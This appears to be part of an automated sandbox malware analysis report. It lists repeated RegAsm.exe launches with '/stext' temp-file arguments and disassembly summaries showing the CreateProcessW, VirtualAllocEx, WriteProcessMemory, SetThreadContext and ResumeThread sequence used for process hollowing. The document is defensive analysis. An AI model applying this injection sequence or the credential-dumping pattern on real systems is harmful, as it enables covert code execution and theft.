                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                Start time:10:24:39
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                Start time:10:24:39
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jxitgxaufcsasqatkrvsifqmdfiulluzow"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                Start time:10:24:40
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\manmhp"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                Start time:10:24:45
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                Start time:10:24:45
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                Start time:10:24:45
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                Start time:10:24:45
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                Start time:10:24:45
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                Start time:10:24:45
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                Start time:10:24:46
                                                                                                                                                                                                Start date:30/09/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:64'704 bytes
                                                                                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 001DD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000A.00000002.449335135.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1dd000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6d0f7b12f204b0bd023e2a0edb1472432aa5e68a5b25c4add8dcdf5d21649057
                                                                                                                                                                                                  • Instruction ID: 140e7787a1da80a5b689dd40c6420767a1032c4601de6679987fc86273c9841b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d0f7b12f204b0bd023e2a0edb1472432aa5e68a5b25c4add8dcdf5d21649057
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D101FD31108340ABEB209E25ECC4B67BB98EFC1764F28C11BFC480B382D3799945CAB1
                                                                                                                                                                                                  Function 001DD006 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000A.00000002.449335135.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1dd000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 8b034ccf078777b932ea885d415191bf765a508bee48c191da0562e372a3b73a
                                                                                                                                                                                                  • Instruction ID: 52b9beb22eb2f6041dbabea26f2118849d501db6d529e4b1f7008f62575d4bdd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b034ccf078777b932ea885d415191bf765a508bee48c191da0562e372a3b73a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB01716140D3C09FD7128B259C94B52BFB8EF53624F1981DBE8888F2A3D2699C48C772

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:3.4%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:21
                                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                                  execution_graph 10893 236b91 10895 236871 10893->10895 10894 2370a8 VirtualAllocEx 10894->10895 10895->10894 10896 23694b 10895->10896 10897 237ce0 10898 237d30 WriteProcessMemory 10897->10898 10899 237d28 10897->10899 10900 237d6b 10898->10900 10899->10898 10901 237928 10902 2379a3 CreateProcessW 10901->10902 10904 237a81 10902->10904 10909 237b68 10910 237bb4 Wow64SetThreadContext 10909->10910 10911 237baa 10909->10911 10912 237be2 10910->10912 10911->10910 10913 236ef8 10914 236f06 10913->10914 10915 236e48 ResumeThread 10914->10915 10917 236871 10914->10917 10915->10917 10916 2370a8 VirtualAllocEx 10916->10917 10917->10916 10918 23694b 10917->10918

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 003209C8 Relevance: 5.2, Strings: 3, Instructions: 1493COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442853576.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_320000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: L4#p$L4#p$L4#p
                                                                                                                                                                                                  • API String ID: 0-1310181111
                                                                                                                                                                                                  • Opcode ID: 4dd46b8ac1fee77707db773724fab8a9ebefc2088922624e4cc0edd7fdf7d574
                                                                                                                                                                                                  • Instruction ID: a3fd62ce10d748ca1993cd988dc30ef29c96366aae02cce6b22537e404710fde
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dd46b8ac1fee77707db773724fab8a9ebefc2088922624e4cc0edd7fdf7d574
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33D25A34600214EFDB15DF54D994ABAB7B6EB89314F24C49AEC1997392CB32EE42CF50
                                                                                                                                                                                                  Function 00237928 Relevance: 1.7, APIs: 1, Instructions: 153processCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 347 237928-2379a1 348 2379a3-2379a6 347->348 349 2379a9-2379b0 347->349 348->349 350 2379b2-2379b8 349->350 351 2379bb-2379d1 349->351 350->351 352 2379d3-2379d9 351->352 353 2379dc-237a7f CreateProcessW 351->353 352->353 355 237a81-237a87 353->355 356 237a88-237b00 353->356 355->356 363 237b12-237b19 356->363 364 237b02-237b08 356->364 365 237b30 363->365 366 237b1b-237b2a 363->366 364->363 368 237b31 365->368 366->365 368->368
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00237A6C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_230000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                                                  • Opcode ID: 74c9d7010aa415ed18721f26f7cbfc628f318b33e01f554f4e3f84ebbae65ea2
                                                                                                                                                                                                  • Instruction ID: bd5cc8876db7cc806cf49dcfca5108f9a452cb6727d41b4bb13a02887f6e5cd6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74c9d7010aa415ed18721f26f7cbfc628f318b33e01f554f4e3f84ebbae65ea2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D5107B1901229DFEF24CF99C880BDDBBB5BF48304F1085AAE909B7250D7719A99CF50
                                                                                                                                                                                                  Function 00237CDE Relevance: 1.6, APIs: 1, Instructions: 61injectionCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 369 237cde-237d26 370 237d30-237d69 WriteProcessMemory 369->370 371 237d28-237d2e 369->371 372 237d72-237d93 370->372 373 237d6b-237d71 370->373 371->370 373->372
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00237D5C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_230000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                  • Opcode ID: 22ca82fe3871057040e9b8da907f39357cfee52743c6220edfec3fceb0e6e738
                                                                                                                                                                                                  • Instruction ID: 7ac50a2211e266e418c5808b0c127ad09cf03626bc90a21d953ac7fc1503f837
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22ca82fe3871057040e9b8da907f39357cfee52743c6220edfec3fceb0e6e738
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE21E8B59102499FDB10CFA9D884BEEBBF4FF48350F108429E458A7250D3789A54CF65
                                                                                                                                                                                                  Function 00237CE0 Relevance: 1.6, APIs: 1, Instructions: 60injectionCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 375 237ce0-237d26 376 237d30-237d69 WriteProcessMemory 375->376 377 237d28-237d2e 375->377 378 237d72-237d93 376->378 379 237d6b-237d71 376->379 377->376 379->378
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00237D5C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_230000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                  • Opcode ID: 8366b1d92f54040f9022941ef44aaf0fa92c672628e0bcf032ab4da94741451c
                                                                                                                                                                                                  • Instruction ID: a442d6fc2e725c74924d47010805cb0ac8f6decf039298b214d93d7d125ac04a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8366b1d92f54040f9022941ef44aaf0fa92c672628e0bcf032ab4da94741451c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B121E5B19102499FDB10CF9AD884BDEBBF4FF48310F50842AE558A7250D378A954CFA5
                                                                                                                                                                                                  Function 00237B60 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 381 237b60-237ba8 382 237bb4-237be0 Wow64SetThreadContext 381->382 383 237baa-237bb2 381->383 384 237be2-237be8 382->384 385 237be9-237c0a 382->385 383->382 384->385
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00237BD3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_230000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                  • Opcode ID: 377e3d79bb1b10135b1b9ecab564f1dd37f7a5971060f70b93862f563d27683c
                                                                                                                                                                                                  • Instruction ID: e9bdd4f505bb9a6b1e740c16d6d236f9f58d20b75a88bfe2c15d10f93f62ce04
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 377e3d79bb1b10135b1b9ecab564f1dd37f7a5971060f70b93862f563d27683c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 491144B1D106498FDB20CFAAC884BDEFBF5AF89324F14806AD458A3640D3389545CFA1
                                                                                                                                                                                                  Function 00237B68 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 387 237b68-237ba8 388 237bb4-237be0 Wow64SetThreadContext 387->388 389 237baa-237bb2 387->389 390 237be2-237be8 388->390 391 237be9-237c0a 388->391 389->388 390->391
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00237BD3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_230000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                  • Opcode ID: 4672e9654d1dc2fa2a05aea77a48675f3d11a1f1a4ed8bf851ef9b1eda952670
                                                                                                                                                                                                  • Instruction ID: c101eb7a858ace872c5db7d2c9b4cc088abaadae27660f0660f9ba2bf7ca8f4e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4672e9654d1dc2fa2a05aea77a48675f3d11a1f1a4ed8bf851ef9b1eda952670
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 981116B1D102498FDB20CF9AC884BDEFBF5EB89324F15842AD458A3740D378A545CFA1
                                                                                                                                                                                                  Function 00236EF8 Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 393 236ef8-236f08 call 231824 396 236e48-236e86 ResumeThread 393->396 397 236f0e-236f1c 393->397 398 236e88-236e8e 396->398 399 236e8f-236e9c 396->399 400 236f22-236f25 397->400 401 2368ed-2368f0 397->401 398->399 404 236ea2-236eb3 399->404 405 23739b-2373a2 399->405 400->401 402 2371f0-2371f9 401->402 403 2368f6-2370f4 VirtualAllocEx 401->403 406 2372a8-2372c8 402->406 407 2371ff-237212 402->407 412 2370f6-2370fc 403->412 413 2370fd-23711a 403->413 404->401 409 236eb9-236ebc 404->409 419 2372d3-2372d6 406->419 420 2372ca-2372cf 406->420 407->401 409->401 412->413 413->401 415 237120-237123 413->415 415->401 421 2372f3-23730a 419->421 422 2372d8 419->422 420->419 421->419 431 23730c 421->431 422->421 423 237338-2373f0 422->423 424 2372df-2372ed 422->424 425 23730e-237317 422->425 424->419 426 2372ef-2372f1 424->426 428 237319-237323 425->428 429 23733f-237361 425->429 426->419 438 237325-23732a 428->438 439 23732c-237336 call 235254 428->439 435 236871-236874 429->435 436 237367-23736a 429->436 431->419 440 237374-23738d 435->440 441 23687a-2368c3 435->441 436->435 438->419 439->419 440->435 443 237393-237396 440->443 447 2368d7 441->447 448 2368c5-2368d5 441->448 443->435 449 2368dc-2368de 447->449 448->449 450 236af7-236b17 call 23180c 449->450 451 2368e4-2368e9 449->451 453 236b1c-236b1e 450->453 451->401 454 236b24-236b35 453->454 455 23694b-236a4f 453->455 454->401 456 236b3b-236b3e 454->456 456->401
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_230000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                                  • Opcode ID: 89cd32c06af6f5bafb83ef8ebdf2cefb8643bc6d80f63e73d1dbbd5dbf459586
                                                                                                                                                                                                  • Instruction ID: abacce9ccf4f2de4e344f3710d1e13f4cf25123d04c3e27c5e596bc9bf3bf7d6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89cd32c06af6f5bafb83ef8ebdf2cefb8643bc6d80f63e73d1dbbd5dbf459586
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89118CB4924215DFEB20DF54C98CB9977BABB04318F2082D5D1096B291C3749DADDF11
                                                                                                                                                                                                  Function 00236E48 Relevance: 1.5, APIs: 1, Instructions: 29threadCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 485 236e48-236e86 ResumeThread 486 236e88-236e8e 485->486 487 236e8f-236e9c 485->487 486->487 488 236ea2-236eb3 487->488 489 23739b-2373a2 487->489 491 236eb9-236ebc 488->491 492 2368ed-2368f0 488->492 491->492 493 2371f0-2371f9 492->493 494 2368f6-2370f4 VirtualAllocEx 492->494 495 2372a8-2372c8 493->495 496 2371ff-237212 493->496 499 2370f6-2370fc 494->499 500 2370fd-23711a 494->500 506 2372d3-2372d6 495->506 507 2372ca-2372cf 495->507 496->492 499->500 500->492 502 237120-237123 500->502 502->492 508 2372f3-23730a 506->508 509 2372d8 506->509 507->506 508->506 518 23730c 508->518 509->508 510 237338-2373f0 509->510 511 2372df-2372ed 509->511 512 23730e-237317 509->512 511->506 513 2372ef-2372f1 511->513 515 237319-237323 512->515 516 23733f-237361 512->516 513->506 525 237325-23732a 515->525 526 23732c-237336 call 235254 515->526 522 236871-236874 516->522 523 237367-23736a 516->523 518->506 527 237374-23738d 522->527 528 23687a-2368c3 522->528 523->522 525->506 526->506 527->522 530 237393-237396 527->530 534 2368d7 528->534 535 2368c5-2368d5 528->535 530->522 536 2368dc-2368de 534->536 535->536 537 236af7-236b1e call 23180c 536->537 538 2368e4-2368e9 536->538 541 236b24-236b35 537->541 542 23694b-236a4f 537->542 538->492 541->492 543 236b3b-236b3e 541->543 543->492
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_230000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                                  • Opcode ID: 4d689c0c5cff88775235aaf4bdb050722d0de6f7141d448dee42b11571dc0f68
                                                                                                                                                                                                  • Instruction ID: d1b7e2c1020458f0fc067d1a4eda987f2eb934c731b9ced534d3c328e1a2b0d0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d689c0c5cff88775235aaf4bdb050722d0de6f7141d448dee42b11571dc0f68
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D01AFB4924218DFEB308F94C88C799BBBABB05318F2085CAD1196B291C3748DDDDF12
                                                                                                                                                                                                  Function 00321F00 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
